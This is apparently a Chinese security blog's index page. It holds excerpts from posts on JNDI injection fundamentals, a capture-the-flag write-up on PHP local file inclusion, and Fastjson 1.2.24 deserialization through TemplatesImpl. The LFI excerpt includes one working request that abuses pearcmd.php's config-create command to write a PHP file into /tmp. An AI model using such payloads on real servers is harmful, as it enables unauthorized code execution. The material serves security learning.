JNDI注入-基础知识 发表于 2023-12-25 分类于 JavaSec 前言弄清JNDI RMI LDAP等基础概念以及手动操作实现 JNDIJNDI 全称为 Java Naming and Directory Interface(Java 命名与目录接口) 是SUN公司提供的一种标准的 Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的一种自然扩展。 阅读全文 »
关于LFI 发表于 2023-12-25 分类于 赛题wp # 前言 pearcmd.phpDocker PHP裸文件本地包含综述 /include.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php 阅读全文 »
Fastjson1.22-1.24反序列化之TemplateImpl 发表于 2023-12-25 分类于 JavaSec 前言初探FastJson,version = 1.2.24 FastJsonFastjson是Alibaba开发的Java语言编写的高性能 JSON 库,用于将数据在 JSON 和 Java Object 之间互相转换,提供两个主要接口 JSON.toJSONString 和 JSON.parseObject/JSON.parse 来分别实现序列化和反序列化操作。 阅读全文 »
